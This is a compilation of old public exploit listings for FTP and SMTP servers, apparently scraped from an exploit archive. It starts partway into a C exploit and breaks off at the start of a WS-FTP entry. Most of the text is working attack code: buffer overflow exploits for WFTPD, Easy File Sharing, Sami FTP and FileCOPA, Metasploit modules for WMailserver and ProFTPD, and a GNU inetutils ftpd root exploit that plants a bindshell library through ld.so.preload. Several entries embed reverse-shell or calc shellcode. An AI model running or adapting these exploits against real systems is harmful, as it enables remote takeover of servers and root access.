cout<<"[+] Connected, constructing the PayLoad..."<<endl;
szNOP1 = 219; // First padding.
szNOP2 = 720; // Second padding.
// Initialise le Buffer PayLoad NULL.
memset( PayLoad, NULL, sizeof( PayLoad ) );
strcat( PayLoad, "USER " ); // Command User.
// First padding.
for( Nop = 0; Nop < szNOP1; Nop++ ){
strcat( PayLoad, "\x90" );}
// New EIP register.
strcat( PayLoad, JmpESP );
// Second Padding.
for( Nop = 0; Nop < szNOP2; Nop++ ){
strcat( PayLoad, "\x90" );}
strcat( PayLoad, MyShellCode );
strcat( PayLoad, "\x0D\x0A" );
// Send fully PayLoad.
if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
cout<<"[-] Sending error, the server prolly rebooted."<<endl;
return -1;}
Sleep( 1000 );
cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
return 0;
}
}
closesocket( sck );
WSACleanup();
return 0; // Bye!
}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n]
// 5 219 4 720 379 2
// [2006-01-31]
21 SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
via a SEH frame overwrite.
}),
'Refs' =>
[
['CVE', 'CAN-2005-2287'],
['BID', '14213'],
],
'Targets' =>
[
['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
['Windows 2000 English ALL', 0x75022ac4],
['Windows XP English SP0/SP1', 0x71aa32ad],
],
'Keys' => ['smtp'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine(" Failed to initialize the nop module.");
return;
}
my $splat = Pex::Text::UpperCaseText(5117);
my $sploit =
" ". $splat. "\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n\r\n";
$self->PrintLine(sprintf(" Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# [2006-02-01]
21 WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07 <[email protected]>
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
coded by h07 <[email protected]>
FTP response: 331 Give me your password, please
FTP response: 230 Logged in successfully
[+] sending buffer: ok
press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include <stdio.h>
#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb6"
"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x 5e\xe9\x6d\x67"
"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\x ce\x11\x7d\x13"
"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x 58\x21\x52\x01"
"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x 8d\x44\xb6\xb0"
"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\x e9\x0c\x93\x73"
"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x 3d\x53\xa2\x13"
"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\x f8\x1e\x7e\xc8"
"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\x e9\x44\x6d\x48"
"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x 37\xfd\x9a\x9a"
"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x 60\x43\xc1\xcb"
"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\x d0\x78\x92\x98"
"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x 60\x7a\x82\xc9"
"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\x ef\x39\x5e\x11"
"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x 48\x52\xbf\x66"
"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\x a0\xef\xe7\xb0"
"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\x e3\x41\x6d\x48"
"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x 49\xc0\xfa\x7f"
"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x 66\x78\x62\x12"
"\xb2\x4f\xc1\x67\x60\xef\x42\x98";
void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}
unsigned long target[] =
{
0x7d16887b, //JMP ESI (XP SP2 polish)
0x776f2015, //JMP ESI (2000 SP4 polish)
0x7cb9e082, //JMP ESI (XP SP2 english)
0x7848a5f1, //JMP ESI (2000 SP4 english)
0x7ca96834 //JMP ESI (XP SP2 german)
};
char buffer[BUFF_SIZE];
main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;
printf("\n WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit\n");
printf(" coded by h07 <[email protected]>\n");
if(argc < 8)
{
printf(" usage:..\n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>\n\n", argv[0]);
printf(" ID list:\n");
printf("[>] 0: XP SP2 polish\n");
printf("[>] 1: 2000 SP4 polish\n");
printf("[>] 2: XP SP2 english\n");
printf("[>] 3: 2000 SP4 english\n");
printf("[>] 4: XP SP2 german\n\n");
printf(" opt - WFTPD option 'restrict to home directory and below'\n");
printf("[>] 0: disabled\n");
printf("[>] 1: enabled\n\n");
printf(" sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2, 0), &wsa);
id = atoi(argv[1]);
opt = atoi(argv[2]);
if((id > 4) || (id < 0))
{
printf("[-] ID error: unknown target\n");
exit(-1);
}
if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown option\n");
exit(-1);
}
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if((he = gethostbyname(argv[3])) == NULL)
{
printf("[-] Unable to resolve\n");
exit(-1);
}
client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: connect()\n");
exit(-1);
}
recv(sock, buffer, BUFF_SIZE -1, 0);
//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %s\r\n", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf(" FTP response: %s", buffer);
//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %s\r\n", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf(" FTP response: %s", buffer);
if(strstr(buffer, "530") != 0) exit(-1);
//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);
switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}
memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: ok\n");
else
printf("[-] sending buffer: failed\n");
printf(" press enter to quit\n");
getchar();
}
//EoF
// [2006-08-21]
21 Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC)
#!/usr/bin/python
#Easy File Sharing FTP Server 2.0 (PASS) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Bug found by h07 <[email protected]>
#Tested on XP SP2 polish
#Date: 28.07.2006
#
#BUFF([PASS + 0x20]+[0x2c]+[NOP * 2571]+[0x41414141]+[\r\n])
#EIP = 0x41414141
host = "127.0.0.1"
port = 21
len_recv = 1024
user_name = "anonymous"
NOP_LEN = 2571
EIP = 0x77AB367B #popad pop ret (CRYPT32.DLL) XP SP2 polish
from socket import *
shellcode = ( #execute calc.exe ******sploit.com>
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\x d8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\x f8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x 18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x 53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x 53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\x a0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\x d8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x 8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x 30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(len_recv)
buffer = "USER %s\r\n" % (user_name)
s.send(buffer)
print s.recv(len_recv)
buffer = "PASS "
buffer += "\x2c"
buffer += "\x90" * (NOP_LEN - len(shellcode))
buffer += shellcode
buffer += intel_order(EIP)
buffer += "\r\n"
s.send(buffer)
print s.recv(len_recv)
s.close()
#EoF
# enigmagroup.org [2006-08-21]
21 ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
use strict;
package Msf::Exploit::vd_proftpd;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
"Name" => "[0day] ProFTPD 1.3.0 stack overflow",
"Version" => "\$Revision: 1.1 \$",
"Authors" => ["Evgeny Legerov"],
"Arch" => ["x86"],
"OS" => ["linux"],
"Priv" => 1,
"UserOpts" =>
{
"RHOST" => [1, "ADDR", "The target address"],
"RPORT" => [1, "PORT", "The target port", 21],
"USER" => [1, "DATA", "Username", "ftp"],
"PASS" => [1, "DATA", "Password", "ftp123"],
"DIR" => [0, "DATA", "Writeable directory", ""],
},
"Description" => Pex::Text::Freeform(q{
This is a proof of concept exploit for src/support.c:sreplace stack overflow.
The off-by-one heap overflow bug in proftpd's sreplace function has been discovered about
2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one bug via MKD command, but failed.
We did not work on this bug since then.
Actually, there are exists at least two bugs in sreplace function,
one is the mentioned off-by-one heap overflow bug the other is stack overflow
via 'sstrncpy(dst,src,negative argument)'.
We were unable to reach the sreplace stack overflow bug on ProFTPD 1.2.10 stable version,
but the version 1.3.0rc3 introduced some interesting changes, among them:
1. another (integer) overflow in sreplace!
2. now it is possible to reach sreplace stack overflow via pr_display_file!
3. stupid '.message' file display bug
So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
To reach the bug, you need to upload a specially created .message file to a writeable directory,
then do "CWD <writeable directory>" to trigger the invocation of sreplace function.
Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message' file
you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
The exploit is a part of VulnDisco Pack since Dec 2005.
}),
"Payload" =>
{
"Space" => 900,
"Keys" => ["+bind"],
"BadChars" => "\%\r\n\x00"
},
"DefaultTarget" => 0,
"Targets" =>
[
["ProFTPD 1.3.0 (source install) / Debian 3.1",
# objdump -D proftpd|grep call|grep edx
0x804afc8,
# nm proftpd|grep permanent_pool
0x80b59f8
]
],
"Keys" => ["vd_proftpd"],
};
sub new {
my $class = shift;
return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
}
sub Exploit {
my $self = shift;
my $host = $self->GetVar("RHOST");
my $port = $self->GetVar("RPORT");
my $writedir = $self->GetVar("DIR");
my $bind_port = $self->GetVar("LPORT");
my $target = $self->Targets->[$self->GetVar("TARGET")];
my $encodedPayload = $self->GetVar("EncodedPayload");
my $shellcode = $encodedPayload->Payload;
my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort" => $port);
if ($sock->IsError) {
$self->PrintLine("Error creating socket: " . $sock->GetError);
return;
}
my $res = $sock->Recv(-1, 20);
if (!$res) {
$self->PrintLine("The service did not return a valid banner");
return;
}
$self->PrintLine("Banner: ". $self->CleanData($res));
$sock->Send("USER ". $self->GetVar('USER') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("USER response: ". $self->CleanData($res));
if ($res !~ /^331/) {
$sock->Close;
return;
}
$sock->Send("PASS ". $self->GetVar('PASS') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PASS response: ". $self->CleanData($res));
if ($res !~ /^230/) {
$sock->Close;
return;
}
if (length($writedir) > 0) {
$sock->Send("CWD $writedir\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
}
my $current_dir = "";
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$current_dir = $1 if ($res =~ /257\s\"(.+)\"/);
$current_dir .= "/" if (substr($current_dir, -1, 1) ne "/");
$self->PrintLine("Current directory: $current_dir");
my $dir1 = "A" x (251 - length($current_dir));
$self->PrintLine(sprintf "Dir1 length is %d bytes", length($dir1));
$sock->Send("MKD $dir1\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
$sock->Send("CWD $dir1\r\n");
$res = $sock->Recv(-1,20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PWD response: " . $self->CleanData($res));
my $dir2 = "B" x 64;
$dir2 .= pack("V", $target->[1]);
$dir2 .= pack("V", $target->[2] - 4);
$dir2 .= "\xcc" x 28;
$self->PrintLine(sprintf "Dir2 length is %d bytes", length($dir2));
$sock->Send("DELE " . $dir2 . "/.message\r\n");
$sock->Recv(-1, 20);
$sock->Send("DELE " . $dir2 . "/250\r\n");
$sock->Recv(-1, 20);
$sock->Send("RMD $dir2\r\n");
$sock->Recv(-1, 20);
$sock->Send("MKD $dir2\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
# Upload .message file
$sock->Send("TYPE I\r\n");
$sock->Recv(-1, 20);
$sock->Send("PASV\r\n");
$res = $sock->Recv(-1, 20);
if ($res !~ /^227/) {
$self->PrintLine("Incorrect response to PASV command: " . $self->CleanData($res));
return;
}
$self->PrintLine("PASV response: " . $self->CleanData($res));
$res =~ /\((\d+)\,(\d+),(\d+),(\d+),(\d+),(\d+)/;
my $datahost = "$1.$2.$3.$4";
my $dataport = (int($5) << 8) + int($6);
$self->PrintLine("Opening connection to $datahost:$dataport");
my $datasock = Msf::Socket::Tcp->new("PeerAddr" => $datahost, "PeerPort" => $dataport);
if ($datasock->IsError) {
$self->PrintLine("Error creating socket: " . $datasock->GetError);
return;
}
$sock->Send("STOR $dir2/.message\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("STOR response: " . $self->CleanData($res));
my $filedata = "";
$filedata .= "A";
$filedata .= "\x66\x81\xc2\x5e\x13\x52\xc3"; # add $0x135e, %dx; push %edx; ret
$filedata .= "\%C" x 11;
$filedata .= "A";
$filedata .= $shellcode;
$filedata .= "A" x (900 - length($shellcode));
$filedata .= "\%CA" x 10;
$datasock->Send($filedata);
$datasock->Close();
$res = $sock->Recv(-1, 20);
$self->PrintLine("FILE transfered: " . $self->CleanData($res));
# Trigger sreplace overflow
$sock->Send("CWD $dir2\r\n");
$sock->Recv(-1,20);
sleep(3);
$sock->Close();
}
sub CleanData {
my $self = shift;
my $data = shift;
$data =~ s/\r|\n//g;
return $data;
}
__END__
# [2006-11-27]
21 GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit
# FTP server (GNU inetutils 1.4.2) Remote Root Exploit
# This program remotely exploits the most recent
# versions of GNU inetutils ftpd on linux systems.
#
# Requirements:
# 1. There MUST be a chroot'ed environment for the logged in user
# 2. Directory etc must be writeable by the logged in user (duh!)
#
# The exploit works as follows:
# 1. Create a shared library including a bindshell
# 2. Create a ld.so.preload file referencing the previously created shared library
# 3. Connect to the remote ftp server and log in using the ftp account
# 4. Upload the shared library and ld.so.preload into /etc
# 5. Run /bin/ls
#
# Result:
# uname -a;id;
# Linux XXXXX 2.6.11.9-vs2.0-rc1-node #1 SMP Fri May 13 11:52:23 CEST 2005 i686 GNU/Linux
# uid=0(root) gid=0(root) egid=70(ftp) groups=70(ftp)
#
# wu-ftpd has a setuid(ftp) before the execv to
# /bin/ls so there is no way escaping the chroot issued before.
#
# signed,
# kingcope Dec/2006
################################################## ############################################
use Net::FTP;
open FILE, ">program.c";
print FILE <<EOF;
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#define L_PORT "\\x0a\\x93" /* Port 2707 */
char ficken[] = "\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x99\\x52\\x53\\x6a \\x02\\x89"
"\\xe1\\xcd\\x80\\x52\\x43\\x68\\xff\\x02"L_PORT"\\x89\\xe1"
"\\x6a\\x10\\x51\\x50\\x89\\xe1\\x89\\xc6\\xb0\\x66 \\xcd\\x80"
"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x52\\x56\\x89\\xe1 \\x43\\xb0"
"\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49 \\xcd\\x80"
"\\x41\\xe2\\xf8\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68 \\x2f\\x2f"
"\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b \\xcd\\x80";
void _init()
{
char *sh[2]={"/bin/sh",NULL};
int gg=0xed;
FILE *f;
setreuid(0,0);
setuid(0);
remove("/etc/ld.so.preload");
chdir("/");
chroot("etc");
while(gg!=0) {
chdir("..");gg--;
}
chroot("..");
void (*fc)();
(long) fc = &ficken;
fc();
}
EOF
close FILE;
open FILE,">ld.so.preload";
print FILE "/etc/libno_ex.so.1.0";
close FILE;
system("gcc -o program.o -c program.c -fPIC;gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles");
$ftp = Net::FTP->new($ARGV[0], Debug => 1) or die "Cannot connect to some.host.name: $@";
$ftp->login("ftp","ftp@") or die "Cannot login ", $ftp->message;
$ftp->binary;
$ftp->put("libno_ex.so.1.0", "/etc/libno_ex.so.1.0");
$ftp->put("ld.so.preload", "/etc/ld.so.preload");
print "\n\nNOTE: Running LS command, check the bindshell on port 2707.\n\n";
$ftp->dir();
$ftp->quit();
# [2006-12-15]
21 ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
# ProFTPd remote root exploit
# solareclipse at phreedom dot org
# GPG key ID: E36B11B7
http://www.enigmagroup.org/sploits/12262006-proftpd-not-pro-enough.tar.gz
# [2003-10-15]
21 FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::filecopa_list;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'FileCopa FTP Server pre 18 Jul Version',
'Version' => '$Revision: 0.1 $',
'Authors' =>
[
'Jacopo Cervini <acaro [at] jervus.it>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'test'],
'PASS' => [1, 'DATA', 'Password', 'test'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d",
# 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the LIST command
in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch.
}),
'Refs' =>
[
['BID', '19065'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000 SP4 English', 160, 0x7c2e7993 ], # jmp esp in ADVAPI32.dll
['Windows 2000 SP4 Italian', 160, 0x79277993 ], # jmp esp in ADVAPI32.dll
['Windows XP SP2 English', 240, 0x77df2740 ], # jmp esp in ADVAPI32.dll
],
'Keys' => ['filecopa'],
'DisclosureDate' => 'Jul 19 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $jmp = "\x66\x81\xc1\xa0\x01\x51\xc3";
#66:81C1 A001 ADD CX,1A0
#51 PUSH ECX
#C3 RETN
my $pattern = ("A" x $target->[1]);
$pattern .= pack('V', $target->[2]);
$pattern .= ("\x90"x4);
$pattern .= $jmp;
$pattern .= ("\x90"x283);
$pattern .= $shellcode;
my $request = "A " . $pattern ."\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER " . $self->GetVar('USER') . "\r\n");
$r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
$r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$self->PrintLine(sprintf (" Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[2]));
$s->Send("LIST $request");
sleep(2);
return;
}
# [2007-01-09]
21 Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe)
# You can put you own shellcode to spawn a shell
# Thrusday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Cannot login User or password not correct."
# That doesn't mean exploit failed whenever you click on Sami FTP server it will crash
# resulting in the execution of calc.exe and will execute whenever the SAMI FTP server
# restarts until it is reinstalled.
use Net::FTP;
print "Coded by UmZ! [email protected]\n";
print "http://www.secure-bytes.com/exploits/\n";
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";
my $msg ="\x90" x596; #140
my $msg2 ="B"x484;
my $shellcode = "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8".
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\x d8\x22\xf9\xa1".
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\x f8\x23\x99\x07".
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x 18\x56\x75\x25".
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x 53\x7d\x56\xe5".
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x 53\x23\x99\x6d".
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\x a0\x2d\xf9\xa4".
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\x d8\xa9\x32\xd0".
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x 8e\xc9\x7f\x8c".
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x 30\xcc\x8d\x1b".
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";
my $test= "\x90" x 108;
my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test . $shellcode. "\r\n";
$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;
$ftp->quit;
# [2007-01-17]
21 IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
